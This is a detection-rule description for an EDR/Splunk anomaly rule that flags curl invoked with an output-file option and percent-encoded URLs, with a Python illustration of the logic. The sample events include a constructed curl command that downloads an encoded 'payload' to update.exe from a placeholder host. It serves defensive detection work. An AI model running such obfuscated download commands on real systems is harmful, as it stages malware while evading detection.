
Summary
This anomaly rule detects execution of the curl utility with percent-encoded URLs and an explicit file output option (such as -o or --output) in the command line. It relies on endpoint telemetry (EDR) to identify curl invocations and flags those that appear to URL-encode download locations or payload paths in order to evade simple string-matching detections.

The detection focuses on curl.exe or curl and requires that the command line includes a -o/--output style option and contains percent (%) encoding. The analysis counts the number of % characters in the command line and triggers when three or more are present, indicating potential obfuscation via URL encoding. The threshold is tunable to fit the environment's risk appetite. On trigger, analysts should review the decoded URL, the destination host, the parent process, and any downloaded file to determine whether the activity was authorized or malicious.

Implementation uses Splunk data with the Endpoint.Processes data model, aggregating telemetry from multiple sources (e.g., CrowdStrike ProcessRollup2, Sysmon Event ID 1, Sysmon for Linux Event ID 1, Windows Security Event 4688) via a tstats-based query that identifies curl processes with -o/--output and a command line containing % characters. The rule maps to a risk-based alert with an informational message about a process spawning curl with URL-encoded parameters, and provides risk objects (user and destination) and threat objects (parent process name, process name, and process).

It references the MITRE ATT&CK techniques Obfuscated Files or Information (T1027) and Ingress Tool Transfer (T1105), and includes multiple references on curl URL encoding and behavior. No known false positives are identified at this time. The rule includes drilldown searches for per-user/destination results and risk events, and supports further investigation through example test data from Sysmon and Windows Sysmon logs. This rule is designed to help detect potential payload retrieval, malware staging, or tool deployment during download workflows.
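The following is an added illustration of the rule's logic outside Splunk, not the rule's own SPL or any code from the project: it applies the same three conditions (process name is curl or curl.exe, an -o/--output style option is present, and the command line contains at least three % characters) to a handful of constructed process events shaped like Endpoint.Processes fields, and then produces the decoded URL and parent-process context an analyst would review on trigger. The sample events, the example.invalid host, and the field names are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample process events (not real telemetry). Field names loosely
# follow the Endpoint.Processes data model: user, dest, parent_process_name,
# process_name, process (the full command line).
SAMPLE_EVENTS = [
    {   # curl.exe with -o and a heavily percent-encoded path: should trigger
        "user": "alice",
        "dest": "ws01",
        "parent_process_name": "cmd.exe",
        "process_name": "curl.exe",
        "process": "curl.exe -o C:\\Users\\Public\\update.exe "
                   "http://example.invalid/%70%61%79%6c%6f%61%64",
    },
    {   # curl with --output but only one % (an encoded space): below threshold
        "user": "bob",
        "dest": "ws02",
        "parent_process_name": "bash",
        "process_name": "curl",
        "process": "curl --output report.pdf https://example.invalid/reports/q1%20report.pdf",
    },
    {   # encoded URL but no file output option: does not match the rule
        "user": "carol",
        "dest": "ws03",
        "parent_process_name": "powershell.exe",
        "process_name": "curl.exe",
        "process": "curl.exe http://example.invalid/%61%62%63",
    },
    {   # not curl at all, even though the command line contains % characters
        "user": "dave",
        "dest": "ws04",
        "parent_process_name": "explorer.exe",
        "process_name": "notepad.exe",
        "process": "notepad.exe C:\\temp\\100%%done.txt",
    },
]

# Tunable threshold; the rule's default is three or more '%' characters.
PERCENT_THRESHOLD = 3

CURL_NAMES = {"curl", "curl.exe"}

# Matches -o, -o<file>, --output and --output=<file> as separate tokens.
OUTPUT_OPT = re.compile(r"(?:^|\s)(?:-o\S*|--output(?:=\S*)?)(?=\s|$)")


def is_curl_encoded_download(event, threshold=PERCENT_THRESHOLD):
    """Return True when the event satisfies all three rule conditions."""
    if event.get("process_name", "").lower() not in CURL_NAMES:
        return False
    cmd = event.get("process", "")
    if not OUTPUT_OPT.search(cmd):
        return False
    return cmd.count("%") >= threshold


def enrich(event):
    """Assemble the analyst-facing context the rule asks reviewers to check:
    risk objects (user, dest), threat objects (parent/process names) and the
    decoded form of every URL found in the command line."""
    cmd = event["process"]
    urls = re.findall(r"https?://\S+", cmd)
    return {
        "user": event["user"],
        "dest": event["dest"],
        "parent_process_name": event["parent_process_name"],
        "process_name": event["process_name"],
        "percent_count": cmd.count("%"),
        "encoded_urls": urls,
        "decoded_urls": [unquote(u) for u in urls],
    }


def run_detection(events, threshold=PERCENT_THRESHOLD):
    """Apply the rule to a list of events and return enriched hits."""
    return [enrich(e) for e in events if is_curl_encoded_download(e, threshold)]


if __name__ == "__main__":
    for hit in run_detection(SAMPLE_EVENTS):
        print(hit)
```

Only the first event fires with the default threshold; lowering the threshold to 1 would also surface bob's download, which shows why the count is exposed as a tunable rather than hard-coded, since a single encoded space in a legitimate filename is common.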
Categories
- Endpoint
Data Sources
- Cloud Storage
- Pod
- Container
- User Account
- Windows Registry
- Script
- Image
- Web Credential
- Named Pipe
- Certificate
- WMI
- Internet Scan
- Persona
- Group
- Application Log
- Logon Session
- Instance
- Sensor Health
- File
- Drive
- Snapshot
- Command
- Kernel
- Driver
- Volume
- Cloud Service
- Malware Repository
- Network Share
- Network Traffic
- Scheduled Job
- Firmware
- Active Directory
- Service
- Domain Name
- Process
- Firewall
- Module
ATT&CK Techniques
- T1027
- T1105
Created: 2026-02-02